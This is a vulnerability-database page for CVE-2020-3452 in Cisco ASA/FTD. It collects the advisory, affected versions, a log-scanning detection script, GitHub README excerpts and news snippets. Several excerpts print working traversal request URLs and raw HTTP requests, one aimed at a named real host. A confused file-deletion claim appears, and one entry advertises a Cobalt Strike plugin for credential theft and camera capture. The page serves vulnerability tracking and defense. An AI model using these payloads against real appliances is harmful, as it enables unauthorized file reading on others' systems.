CVE-2020-3452

Published: 22/07/2020 Updated: 29/07/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote malicious user to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the malicious user to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
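Added example (not taken from the advisory or from any repository listed on this page): a log triage script that flags requests to the two `+CSCOT+` endpoints quoted in the PoC READMEs further down whenever a query parameter decodes to a `..` path segment. The combined-format log layout, the sample lines, the repeated percent-decoding and the status-code heuristic are assumptions of this example, and it also covers encoded variants that the page does not show.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The two endpoints named in the request examples on this page (lower-cased).
ENDPOINTS = ("/+cscot+/translation-table", "/+cscot+/oem-customization")

# Assumption: combined-format access log written by a reverse proxy or
# TLS-terminating sensor in front of the appliance.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jul/2020:10:02:11 +0000] "GET /+CSCOT+/translation-table?type=mst'
    '&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 18342 "-" "-"',
    '203.0.113.7 - - [24/Jul/2020:10:02:12 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect'
    '&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.20 - - [24/Jul/2020:10:03:40 +0000] "GET /+CSCOT+/translation-table?type=mst'
    '&textdomain=AnyConnect&lang=en-us HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [24/Jul/2020:10:05:01 +0000] "GET /+CSCOT+/translation-table?type=mst'
    '&textdomain=/%252bCSCOE%252b/portal_inc.lua&lang=%252e%252e%252f HTTP/1.1" 200 18342 "-" "-"',
    '198.51.100.20 - - [24/Jul/2020:10:06:00 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 900 "-" "-"',
]


def decode_repeatedly(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%252e%252e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_dotdot_segment(value):
    """True if any path segment of the decoded value is exactly '..'."""
    normalized = decode_repeatedly(value).replace("\\", "/")
    return ".." in normalized.split("/")


def inspect_request(target):
    """Return the traversal-carrying parameters of a request target, or None."""
    parts = urlsplit(target)
    path = decode_repeatedly(parts.path).lower().rstrip("/")
    if path not in ENDPOINTS:
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = sorted({name for name, value in params if has_dotdot_segment(value)})
    if not hits:
        return None
    # textdomain= / name= carry the requested file in the requests on this page.
    wanted = [value for name, value in params if name in ("textdomain", "name")]
    return {"params": hits, "file": decode_repeatedly(wanted[0]) if wanted else None}


def scan(lines):
    """Return one finding per log line that matches the traversal pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_request(m["target"])
        if hit:
            findings.append({
                "src": m["src"],
                "time": m["ts"],
                "status": int(m["status"]),
                # Heuristic (assumption): a 200 suggests content was returned,
                # so these hosts are the first to check against a fixed release.
                "outcome": "served" if m["status"] == "200" else "attempted",
                **hit,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings marked `served` identify appliances to check first against the fixed releases in the Cisco advisory; the advisory quoted on this page states there is no workaround.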

Affected Products

Vendor | Product | Versions
Cisco | Adaptive Security Appliance | 9.6, 9.6.0, 9.6.2, 9.6.4.30, 9.6.4.31, 9.6.4.34, 9.6.4.36, 9.6.4.40, 9.8, 9.8.0, 9.8.4, 9.8.4.7, 9.8.4.9, 9.8.4.10, 9.8.4.17, 9.9, 9.9.0, 9.9.2.50, 9.9.2.56, 9.9.2.66, 9.10, 9.10.0, 9.10.1.22, 9.10.1.27, 9.10.1.30, 9.10.1.37, 9.12, 9.12.0, 9.12.2.1, 9.12.2.5, 9.12.2.9, 9.12.3, 9.12.3.7, 9.13, 9.13.0, 9.13.1, 9.13.1.2, 9.13.1.7
Cisco | Firepower Threat Defense | 6.2.3, 6.2.3.1, 6.2.3.2, 6.2.3.3, 6.2.3.4, 6.2.3.5, 6.2.3.6, 6.2.3.7, 6.2.3.9, 6.2.3.10, 6.2.3.11, 6.2.3.12, 6.2.3.13, 6.2.3.14, 6.2.3.15, 6.3.0, 6.3.0.1, 6.3.0.2, 6.3.0.3, 6.3.0.4, 6.3.0.5, 6.4.0, 6.4.0.1, 6.4.0.2, 6.4.0.3, 6.4.0.4, 6.4.0.5, 6.4.0.6, 6.4.0.7, 6.4.0.8, 6.4.0.9, 6.5.0, 6.5.0.2, 6.5.0.3, 6.6.0

Vendor Advisories

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URL ...

Mailing Lists

Adaptive Security Appliance Software version 911 local file inclusion exploit ...
Cisco Adaptive Security Appliance Software version 97 unauthenticated arbitrary file deletion exploit ...

GitHub Repositories

http-vuln-cve2020-3452.nse
CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script

CVE-2020-3452
Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices. Python first timer, pls do not kill me. ;-(
USAGE
    python CVE-2020-3452.py /path/to/input/file.txt /path/to/output/file.txt
DISCLAIMER: Please use this script only on subjects you own or you have the permission to test for.
INFORMATION REGARDING CVE-2020-3452
See Documents:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452
https://nvd.nist.gov/vuln/detail/CVE-2020-3452
https://de.tenable.com/blog/cve-2020-3452-cisco-adaptive-security-appliance-and-firepower-threat-defense-path-traversal
"Summary: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Note: Cisco has become aware of the availability of public exploit code and active exploitation of the vulnerability that is described in this advisory. Cisco encourages customers with affected products to upgrade to a fixed release as soon as possible." @ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Exploit CISCO Remove File Via session_password.html
Detect and Verify that the vulnerability:
Downloaded the vulnerable code and compared it with the code from local environment.
When this path exists +CSCOE+/session_password.html this means the vulnerability isn't patched, and if the response is 404 that means the vulnerability is patched.
Vuln: (screenshot) Patched: (screenshot)
Exploiting the vulnerability:
Trying to download a file using CVE-2020-3452:
    https://192.168.1.100/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/wrong_url.html&default-language&lang=../
Issue Request Exploit the vulnerability:
    GET /+CSCOE+/session_password.html HTTP/1.1
    Host: 192.168.1.100
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Cookie: token=../../../../../../+CSCOE+/wrong_url.html
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
The file is read and stored in webvpn cookie and then deleted.
    https://192.168.1.100/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/wrong_url.html&default-language&lang=../
This file has been deleted.

CVE-2020-3452
Hello guys. This is a simple script to download the nmap NSE script, put it in the NSE modules file, and run the nmap command with any hosts you want. Put your host list in the list.txt file. Thanks

CVE-2020-3452
No description, website, or topics provided.

CVE-2020-3452 - Cisco ASA Scanner
Scanning for CVE-2020-3452 - unauth Path Traversal affecting Cisco ASA firewalls running anyconnect
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452
Supporting Documents:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://twitter.com/aboul3la/status/1286012324722155525
Disclaimer: I am not responsible for the use of this tool or any damages, DO NOT USE THIS FOR ILLEGAL PURPOSES. This tool was designed to scan for authorised assets to automate the check for this vulnerability on multiple cisco instances.
Introduction: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features.
I created this script to allow an engineer to parse in a file of urls to test against.
Install:
    git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
    chmod +x scanner.py
amend the urls.txt file with the urls https://XX.XX format.
    python3 ./scanner.py

CVE-2020-3452
CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense

cve-2020-3452
CVE-2020-3452.py (commit message): added file v0.1 - just a really simple script, that I made to scan for vulnerable subjects for CVE-2020-3452

pmg
Extract parameters/paths from urls
usage:
    $ cat urls.txt | python3 PmG.py
results
Save results
    $ cat urls.txt | python3 PmG.py ResultsFile.txt
here you can add more parameters/paths using regex :D
    wordlist = [
        r'(url=|password=|link=|u=|word=|username=|link_id=)',
        r'\+CSCOU+', # CVE-2020-3452
        r'\.(sql|db|tar|backup|bak|zip|git|php)'
    ]

cve-2020-3452
unauth file read in cisco asa & firepower.

CVE-2020-3452
CVE-2020-3452 exploit

[CVE-2020-3452] Cisco ASA & Cisco Firepower Unauthenticated File Read
https://{host}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
    GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
    Host: scrvpn.socar.com.tr
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
https://{host}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
    GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1
    Host: scrvpn.socar.com.tr
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close

open-twitter-hacking
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file.
    https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!

are_we_vulnerable
Checking the recently disclosed vulnerabilities over the network.
BIG-IPF5_CVE(2020-5902) - https://github.com/yasserjanah/CVE-2020-5902
Citrix Application Delivery Controller and Citrix Gateway(CVE-2019-19781) - https://github.com/mpgn/CVE-2019-19781
Cisco Adaptive Security Appliance and Firepower Threat Defense (CVE-2020-3452) - https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-3452.nse
Usage
    $ echo "host1 host2 host3" | ./scanner
Reading an input from a file
    $ cat myservers.txt | ./scanner

梼杌 (Taowu)
For exchange and study only; do not use for illegal purposes!
A plugin for Cobalt Strike 3.x and Cobalt Strike 4.x.
The exploits used in the plugin were all collected from the internet and their safety is not guaranteed; be sure to carry out your own security review!
English-version
Thanks to vcarus for English translation support
Feature overview
Contributors: vcarus
References:
https://github.com/DeEpinGh0st/Erebus
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/0x09AL/RdpThief
https://github.com/uknowsec/sharptoolsaggressor
https://github.com/lengjibo/RedTeamTools/tree/master/windows/Cobalt%20Strike
Apologies for any omissions.
Update 3.1 (2020.7.28)
1. The information-gathering module adds antivirus comparison (uknowsec's SharpAVKB, slightly modified and combined with Vulkey_Chen's avList, adding detection for roughly 400 AV processes).
2. The vulnerability-detection module adds CISCO ASA (CVE-2020-3452) and weblogic (CVE-2016-0638, CVE-2016-3510, CVE-2017-3248, CVE-2017-10271, CVE-2018-2628, CVE-2018-2893, CVE-2019-2725).
3. The credential-retrieval module adds RcoIl's SharpDecryptPwd; there are now two SharpDecryptPwd in total.
4. The privilege-escalation module adds dazzleUP.
5. The entertainment module adds audio recording (speaker, microphone) and turning on the camera to take photos.
Update 3.0 (2020.7.14)
1. Added the "privilege escalation" and "lateral movement" modules.
2. Optimized how some functions are executed.
3. Added port forwarding and other functions.
Announcement
1. Taowu is itself a project that combines original work with learning, and it has been inclusive from the start. Thanks to the GitHub contributors who, in a spirit of sharing, open-sourced so much excellent code; standing on the shoulders of giants, one can always see a bigger world.
2. To maintain this project better, everyone interested in it is invited to take part in its maintenance and development. There is no restriction on features or on skill level, even if the contribution only outputs a whoami. Contributors can submit code directly to GitHub or send it to taowuopen@protonmail.com.
3. Contributors, please state your ID and your GitHub or blog address in the e-mail; this will be permanently attached to the GitHub project page and to Taowu's About module.
4. For various reasons, some non-public versions will be produced during maintenance and development; these non-public versions of Taowu will later be provided to the authors who take part in maintenance and development.

Templates are the core of nuclei scanner which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via pull requests and grow the list.
Template Directory
├── LICENSE
├── README.md
├── basic-detections
│   ├── basic-xss-prober.yaml
│   └── general-tokens.yaml
├── brute-force
│   └── tomcat-manager-bruteforce.yaml
├── cves
│   ├── CVE-2017-10075.yaml
│   ├── CVE-2017-7529.yaml
│   ├── CVE-2017-9506.yaml
│   ├── CVE-2017-9841.yaml
│   ├── CVE-2018-0296.yaml
│   ├── CVE-2018-1000129.yaml
│   ├── CVE-2018-11409.yaml
│   ├── CVE-2018-11759.yaml
│   ├── CVE-2018-1247.yaml
│   ├── CVE-2018-1271.yaml
│   ├── CVE-2018-13379.yaml
│   ├── CVE-2018-14728.yaml
│   ├── CVE-2018-16341.yaml
│   ├── CVE-2018-18069.yaml
│   ├── CVE-2018-19439.yaml
│   ├── CVE-2018-20824.yaml
│   ├── CVE-2018-2791.yaml
│   ├── CVE-2018-3714.yaml
│   ├── CVE-2018-3760.yaml
│   ├── CVE-2018-5230.yaml
│   ├── CVE-2018-7490.yaml
│   ├── CVE-2019-10475.yaml
│   ├── CVE-2019-11510.yaml
│   ├── CVE-2019-12314.yaml
│   ├── CVE-2019-14322.yaml
│   ├── CVE-2019-14974.yaml
│   ├── CVE-2019-15043.yaml
│   ├── CVE-2019-16759.yaml
│   ├── CVE-2019-17382.yaml
│   ├── CVE-2019-18394.yaml
│   ├── CVE-2019-19368.yaml
│   ├── CVE-2019-19781.yaml
│   ├── CVE-2019-19908.yaml
│   ├── CVE-2019-19985.yaml
│   ├── CVE-2019-2588.yaml
│   ├── CVE-2019-3396.yaml
│   ├── CVE-2019-3799.yaml
│   ├── CVE-2019-5418.yaml
│   ├── CVE-2019-8449.yaml
│   ├── CVE-2019-8451.yaml
│   ├── CVE-2019-8903.yaml
│   ├── CVE-2019-8982.yaml
│   ├── CVE-2020-10199.yaml
│   ├── CVE-2020-10204.yaml
│   ├── CVE-2020-1147.yaml
│   ├── CVE-2020-12720.yaml
│   ├── CVE-2020-13167.yaml
│   ├── CVE-2020-2096.yaml
│   ├── CVE-2020-3187.yaml
│   ├── CVE-2020-3452.yaml
│   ├── CVE-2020-5284.yaml
│   ├── CVE-2020-5405.yaml
│   ├── CVE-2020-5410.yaml
│   ├── CVE-2020-5902.yaml
│   ├── CVE-2020-6287.yaml
│   ├── CVE-2020-7209.yaml
│   ├── CVE-2020-7961.yaml
│   ├── CVE-2020-8091.yaml
│   ├── CVE-2020-8115.yaml
│   ├── CVE-2020-8191.yaml
│   ├── CVE-2020-8193.yaml
│   ├── CVE-2020-8194.yaml
│   ├── CVE-2020-8512.yaml
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9484.yaml
│   └── CVE-2020-9757.yaml
├── dns
│   ├── azure-takeover-detection.yaml
│   ├── cname-service-detector.yaml
│   ├── dead-host-with-cname.yaml
│   └── servfail-refused-hosts.yaml
├── files
│   ├── apc-info.yaml
│   ├── cgi-test-page.yaml
│   ├── debug-pprof.yaml
│   ├── dir-listing.yaml
│   ├── docker-registry.yaml
│   ├── drupal-install.yaml
│   ├── elasticsearch.yaml
│   ├── exposed-kibana.yaml
│   ├── exposed-svn.yaml
│   ├── filezilla.yaml
│   ├── firebase-detect.yaml
│   ├── git-config.yaml
│   ├── htaccess-config.yaml
│   ├── jkstatus-manager.yaml
│   ├── jolokia.yaml
│   ├── laravel-env.yaml
│   ├── lazy-file.yaml
│   ├── phpinfo.yaml
│   ├── public-tomcat-instance.yaml
│   ├── security.txt.yaml
│   ├── server-status-localhost.yaml
│   ├── telerik-dialoghandler-detect.yaml
│   ├── telerik-fileupload-detect.yaml
│   ├── tomcat-scripts.yaml
│   ├── wadl-files.yaml
│   ├── web-config.yaml
│   ├── wordpress-directory-listing.yaml
│   ├── wordpress-user-enumeration.yaml
│   ├── wp-xmlrpc.yaml
│   └── zip-backup-files.yaml
├── panels
│   ├── atlassian-crowd-panel.yaml
│   ├── cisco-asa-panel.yaml
│   ├── citrix-adc-gateway-detect.yaml
│   ├── compal.yaml
│   ├── crxde.yaml
│   ├── docker-api.yaml
│   ├── fortinet-fortigate-panel.yaml
│   ├── globalprotect-panel.yaml
│   ├── grafana-detect.yaml
│   ├── jenkins-asyncpeople.yaml
│   ├── jmx-console.yaml
│   ├── kubernetes-pods.yaml
│   ├── mongo-express-web-gui.yaml
│   ├── parallels-html-client.yaml
│   ├── phpmyadmin-panel.yaml
│   ├── pulse-secure-panel.yaml
│   ├── rabbitmq-dashboard.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── sap-recon-detect.yaml
│   ├── sophos-fw-version-detect.yaml
│   ├── supervpn-panel.yaml
│   ├── swagger-panel.yaml
│   ├── tikiwiki-cms.yaml
│   ├── weave-scope-dashboard-detect.yaml
│   └── webeditors.yaml
├── payloads
│   └── CVE-2020-6287.xml
├── security-misconfiguration
│   ├── basic-cors-flash.yaml
│   ├── basic-cors.yaml
│   ├── front-page-misconfig.yaml
│   ├── jira-service-desk-signup.yaml
│   ├── jira-unauthenticated-dashboards.yaml
│   ├── jira-unauthenticated-popular-filters.yaml
│   ├── jira-unauthenticated-projects.yaml
│   ├── jira-unauthenticated-user-picker.yaml
│   ├── rabbitmq-default-admin.yaml
│   ├── rack-mini-profiler.yaml
│   ├── springboot-detect.yaml
│   └── wamp-xdebug-detect.yaml
├── subdomain-takeover
│   ├── detect-all-takeovers.yaml
│   └── s3-subtakeover.yaml
├── technologies
│   ├── bigip-config-utility-detect.yaml
│   ├── citrix-vpn-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── github-enterprise-detect.yaml
│   ├── gitlab-detect.yaml
│   ├── graphql.yaml
│   ├── home-assistant.yaml
│   ├── jaspersoft-detect.yaml
│   ├── jira-detect.yaml
│   ├── liferay-portal-detect.yaml
│   ├── linkerd-badrule-detect.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── netsweeper-webadmin-detect.yaml
│   ├── ntlm-directories.yaml
│   ├── prometheus-exposed-panel.yaml
│   ├── s3-detect.yaml
│   ├── sap-netweaver-as-java-detect.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── sql-server-reporting.yaml
│   ├── tech-detect.yaml
│   ├── weblogic-detect.yaml
│   └── werkzeug-debugger-detect.yaml
├── tokens
│   ├── amazon-mws-auth-token-value.yaml
│   ├── aws-access-key-value.yaml
│   ├── google-api-key.yaml
│   ├── http-username-password.yaml
│   ├── mailchimp-api-key.yaml
│   └── slack-access-token.yaml
├── vulnerabilities
│   ├── cached-aem-pages.yaml
│   ├── couchdb-adminparty.yaml
│   ├── crlf-injection.yaml
│   ├── discourse-xss.yaml
│   ├── git-config-nginxoffbyslash.yaml
│   ├── ibm-infoprint-directory-traversal.yaml
│   ├── microstrategy-ssrf.yaml
│   ├── moodle-filter-jmol-lfi.yaml
│   ├── moodle-filter-jmol-xss.yaml
│   ├── nginx-module-vts-xss.yaml
│   ├── open-redirect.yaml
│   ├── oracle-ebs-bispgraph-file-access.yaml
│   ├── pdf-signer-ssti-to-rce.yaml
│   ├── rce-shellshock-user-agent.yaml
│   ├──
rce-via-java-deserialization.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows ├── bigip-pwner-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml ├── netsweeper-preauth-rce-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml └── springboot-pwner-workflow.yaml 13 directories, 204 templates. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. Notes: Use YAMLlint (e.g. yamllint) to validate new templates when sending pull requests. Use YAML Formatter (e.g. jsonformatter) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. About Community curated list of template files for the nuclei engine to find security vulnerability and fingerprinting the targets. github.com/projectdiscovery/nuclei Topics nuclei-templates nuclei bugbounty security content-bruteforcing Resources Readme License MIT License Releases 43 v4.0.2 Latest 22 hours ago + 42 releases Contributors 67 + 56 contributors

Recent Articles

Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns
Threatpost • Lindsey O'Donnell • 27 Jul 2020

Cisco is warning that a high-severity flaw in its network security software is being actively exploited – allowing remote, unauthenticated attackers to access sensitive data.
Patches for the vulnerability (CVE-2020-3452) in question, which ranks 7.5 out of 10 on the CVSS scale, were released last Wednesday. However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.
“The Cisco Product Security Incident Response Te...

Cisco patches ASA/FTD firewall flaw actively exploited by hackers
BleepingComputer • Sergiu Gatlan • 24 Jul 2020

Cisco fixed a high severity and actively exploited read-only path traversal vulnerability affecting the web services interface of two of its firewall products.
If successfully exploited, the security vulnerability tracked as CVE-2020-3452 may allow unauthenticated attackers to read sensitive files on unpatched systems through directory traversal attacks.



...

Cisco Network Security Flaw Leaks Sensitive Data
Threatpost • Lindsey O'Donnell • 23 Jul 2020

A high-severity vulnerability in Cisco’s network security software could lay bare sensitive data – such as WebVPN configurations and web cookies – to remote, unauthenticated attackers.
The flaw exists in the web services interface of Cisco’s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security...

The Register

In Brief Cisco this week emitted fixes for potentially serious vulnerabilities, one of which is already being exploited in the wild.
The under-attack bug is CVE-2020-3452, a path-traversal flaw in Switchzilla's Adaptive Security Appliance and Firepower Threat Defense software that can be used to "read sensitive files on a targeted system." While there was no publicly available exploit code for the high-severity bug when first publicized, a day after issuing its advisory, Cisco said the fla...